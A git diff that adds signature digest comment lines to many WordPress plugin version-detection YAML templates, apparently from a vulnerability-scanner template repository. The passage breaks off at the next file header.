cddbb4bb2ed..a359ada3b0a 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008f273d9bb5a5800db9cb409844d00d78fec4a3cea580c1ce0ad8419cce74ab1302206d356f2cd8d9d88b8770c1c0343c06a9c7f26b1a9f0c40875974d2237ecf1b70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f556..edb8c235cc3 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022005f9bd434ae860d0557451f0955d772f8d3d4a6622a122158a98e77dd6b44e9f02203515951e0defd8f8386ca32042e6112d2708fa83b1bfc1f3d6d427da9e0d8597:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d042..94110d9aa18 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c0af74aa1b0309f5f438b3219709da1eca95f8d8d473f45e679bcce400a0276f022100f6f8455d8e61ec5ea15f6036489a9854902711ae3e1b492d9719cbdf2eb58dc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f4469..cedf65eabb1 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204e719c69eeb2e8afe161ed7df2ccb1b55e7e4e1a0279789d9c475349f6517eb8022100f4e5c711c932341c099166d06e5fdb5f734b77e158e11beaff0b0b721f5d1012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e6..598684daa07 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bd909cf9f7b3096c8bb2b372fa088ee47b02a656ac46253a8244307004b78e1502203ee92b615ece2db70a6dc51aa0d40f58ef8ba311c7253f157aeb43dcba10a1bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e9..9fe7ad453ad 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206400dd13973b38a453d36677d8ad8cc9b3d4a18be4fa521345cb7b12fc415eba02201fe575039bef790f887e3f9add5b06a528b8022e1007b3e06a17757a90f6c169:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1f..e828f8a27d0 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022036d7f2d8592acc18f02485d2f1b8f31c0cfce605bc8db078ebaaacd6cee099cb022100f21655e844531bff9b3d54519ea56c368305ab0e0fba6fbd9040974521c08b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd5..7f3d77e4206 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220486205af7a7b8c46fde8599d0d373ee29a1594b501e6cd2b16c8ec0cf85261a60220108403c89e0d01edbdd0a09144a651405ab7171484efd8477ea3793c5e73b3cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84c..0e6dea51ee6 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022009ca7266615490f6cdcf6ae734764dceb565b777b8a70a9fb3130d3252b2d8f902202b11fc679bb0290b4b57ab07600cdf83ddcc0563f830c6e051f34630d2287c31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2ce..79f1720d4c2 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207ab2d665d93a87ea30cfe859028d03e196e6bdd9665c7d8a737f5b192b345966022100d680e25c8038126ba7f6fed82a471a23ceb608eaf56f7822e7f484fa30271373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a944..aaf2cfcb3ee 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b8929c38bc16bc860b0c60bb47e3c1488fca117dec3d9ca4d0192b305d18740a02200f863bb1cb74b3fb0e190cdfff4d327d3f156cd1b27dab27cbe0f73a8f5a1045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dca..f6cab364585 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008f1ceb9e6b1250ee01679ec431db13f5197e09ea9f99c85900226ac03a044fff02210088bba8a371519726dd341bca5c9cb3f4ab86ba0aebdc9b4c97b6d84233327dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e5326941673..a353721a9ee 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206427cd8cead5e3e240698c81c7c8c3e9dbf09bb46ba30ce09f0ff3fff274d7c6022012c38f3b956383be24018adbc679d5c6d96ab4fabdba43035795f91d162d3b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d6..5367ef60cf5 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009eeb775c55bd4b3535d970b3b036c266f8dd0c87df12189ad70139f98da03527022100a904e15843f148fa55bed792fa3a82b2f2c5b076f8ce37713c3f7e990d824083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c3..6b067af85f6 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206730b8bc898affd0ce3da1830f8b895a487f0f41d843ba269827e725dc2313a6022100b06ed2403148a76e21a5e652a924bc378da04d4aa0a692bcb7334f36010234e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a3..155c160466f 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085bc5cb80bcc35b1e9a5f6cce4806183cc13930f4b4be3e08aa8f5daae4b8ba2022100cea47ae1afd3b8b5c6fb1ae2bda64379ef45001e2075791c76c979ef83931a9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179ee..bac2767798d 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ab49e179d8f0bb56970358efcce70a076d6e6822d4e14dc472aa146e69baae4e02204e6f9459827aadbcc3f58a059811dcbc50362bb6269331c7f53bd4e7b1353fec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d139..6a19758c87c 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022039ffae78b313888a856bf07ac7cf587bff1d491d20175933cb997e205514d62a02200e0739c11cce30e3c1c78d7a19f3ecc82941fd6dc9a970d37484e48b753cd609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f6..e732ea1afba 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b75a45b3a2be7ca5f806385e92a0e261f648c32945891386705cfffcfca005d8022100c7b46bbd85fbbaae2d20fe9bba37fc0e64653246cb594d5d963b694fdcbd7b94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924be..6605bc370b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e5f6bcfa0b12bde2be684f09b34ac954eb9db81c9a354ddaf534f3b62479eaab022100bbde1a6a03f03e2a757933d2e39b250fe605dfd93ece4a56a3563261c29ac3f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a39..2ee534e692a 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e35d05afe05a5b9f11304c44f8235a64145a40cb91de093c59a8a3c3d3a0900c0220465eb9d24e37135cadd08088b13210642fd580c27f663797e10703bc58749400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4a..b173eab2a5e 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100893564c7a7c46cdeccf0e33330f66ace91664fd30c6b7766f14d56e4eeae93d002202b828f229d9881e37efb7d65107d633d1400448964dac235f213c2bbc158ab9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545d..47224616ed5 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008857696ca5eea0797d763a2bdab2cee863947306d0c58524e01e6ec49a0da9c60221009403163d87ad72265bb94a8cdaed63598a65cd93bdc7bd832a548b17027cd64a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f181225..fe640cffcfa 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c63fda43b705b044e6b14bf1738018db4ec16b388438f7776bc2e0047cbe489c022100a5a7310f66aa1acde8874347906e3b445a9dca804e4b769b96484ec51a1823f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d5369..0fa0addbdb1 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d38fc87f0731a79774ac83022759deddd707255c9baea7f5b72eec441384ab5702205722018af7a9ccf9ad056466e0194f3510681a1e0be97ae82015e851972e1fb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1d..12d10d8b384 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220661b89833b5ae6b3bcc185a66e4a548e3f4e0327f3dc5128b2160eb1fec8f30102206c09aab9dcfea188edaf92ece0390a3e7a9f49aa54f2d05d58abdfe09ab73ce5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc979..b9d7590df27 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203668622a4e87c4b4865f24b460661d7f86e627be23b5b83c9aaaf434532235c7022004f50f5f3e537d4b3d65b4ab6989e8f1977eb152529562c877aef029bff5fc81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f934..0f383c11767 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022058f293a946fecc6da72e9865fef09b8371a762d8c9e6108d2c3e28f76686bda50221008e7fef8351e428d49b6a2b738aa8a31c258530d98dd7f998edc8e291a409ab92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf361..bb515483627 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220607fff18b414cf42694e29df52c62a9438721703b1c24e64c733eb635ac88f80022100c565fa8bd4bb8e29339ce26a806204a3f2bc93294f186ea7cf4b7417d55387fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d26..1023993ceb6 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220368cfad172de8e1418b9d67edeae7be929309ca7dcf78ebd6c9c4e1d12153b6802205c8738e9f5afae118dc957cd107f31790c3e0a0205a1a61a0e80792ef4bb1e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86e..bab686eb735 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025412e4ea8b06dbb1e6467bc51f8f5efd1660a3d5bee0d80412061b3e4c50b04022100fc0d27b088a0b9de5135203b0ea6dd55cd9e39c681e1209d5469afdf0e3bfde0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b6..35170af76a4 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bfe4b78e10b674b1083f0a12b8d1a4e4e65f320da45251029b96abd3537a4e0b02204483ae486d6d2fd4a8e0b0bcd229fde840764a0996d03dbf47dbf5218950dafe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b0..ca150498934 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206e08c841bb5399a2ea23d95f4ee289feaaa0c27705d9314c1202a931ed7c8c91022100e95c87c44b1fbe60d808ba3990eff56eab4cfdcddcc1905c446113ac0ca30c39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566f..427a4f4d2aa 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008b2b1d87051c6fe7567403a76bf18f720135f66992506ae3ed2be80e655036ab0221009c8768644a8d5fe951783b52e89eb5671cb935734f0ddfc46762700b7c5130fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a154..0da0134b71d 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d7c9e7c74a5e4d95960bb0780027aac378d0d9554ff6e3be313472b323f6d5c5022100edb34fd121baf93ccd889fe35aa9f78d754b4efd7b22e53189df495dbf710108:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f2..025e00ac5a5 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207e41d7f6b6650450e5d0b12eaf7e54212d6adca18c7bf885266cc161e691082402207e8e73b4df4e21dd23cc47726d1859e7322e83276083aeb46095472276c1ce37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c920917673..3921b45b344 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a86e2aa726400f7503dace36e05463574c5c42675879bf370c36734160e08927022064afd7ff65664937033ec9e7daf47228a2d1ece8e67b74775df7765462893e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9ce..020cc39aa3c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e09b269c963b2d466e2b4461bd2b1e34ce44515e1726bbf1dfd972f14189ac2402201b572fe490b50632cd85404e9e004218ebe37d16021ae3290eeab233302feb2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05e..1580eec5b1f 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aab350f3dcc088fc8642c6ec38f617201b45e6a08b0219cf89754a58b3a9d2360220574a35a4907c849648db8f7ec9e5ce2a9903fc825a0f6de348760122e1e921a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce34093..1d373951b74 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dcb22bb64e4a2b62a6d427b459abed5e585cd156f758b14ff2e7111793b4fe6d02201d199f49c15a1af1fa0d92b3bd4973e5b74b4e4c81b6ac16ed4190afec0ef7f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8dad..4e345925990 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c588b94ad7b1ba13002b321cd539213a4890b24e239288968a543b2a371f7343022028b9b7847c7a7bb5bd657df3f815e7216ff27aa09cb4293bcfb8afdea91d4ca9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eba..990f77bb620 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100814c1784742c116a56f46f93f7cce06de7a9670b94d1c2c4b5a698fd720095310221009498a7d2e04db2adb5f98f8483e4c0813d36daa1d086cfa52a7584af5cdcc0e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df5..76f04102f8f 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206389702b585158c9330a287c18cff7343e5408702cfe04191ec3885265593714022100d2cfdbfd26cf261253d7024d5108f75c13962895bc5d0a2fe7832444ae47ee96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73ed..b495c2fd71e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022000a930b03da6378acb15358fa1aadc71783dbe29fc81507aa8db14ea49ed56a50221008008f3099d569469f2abfec8674a9ba44663213ae450d6168dc4ecdfcfa3741c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f00931279..d1c6abf13bc 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eb56a3d16277582fd7680a872a9479242ba4bbd758ac40fa2790a4734516074f02210094487b6015cfbd6e4880b73484bee39ebbfb7e4ff5044e62207402dacd98ebc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d6..953efec6772 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aac2fb65b5c35854d9661f779dbb8aba47f754bd7a94174e0df7702024cce30d022100e5a13a7604956d9e31b92f9a089acda9c5e101745e98d7796c7a17336834c50c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d8..38e50969bb9 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b58ee8ea24bfebaa8c947fa2d8053f7a4249f8d9971f44c58bc0a94e3402c530022100b3ef8073e109771d6b5379fb4b04e7d68a5b17e7cf18115fff6702f07deb11e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml 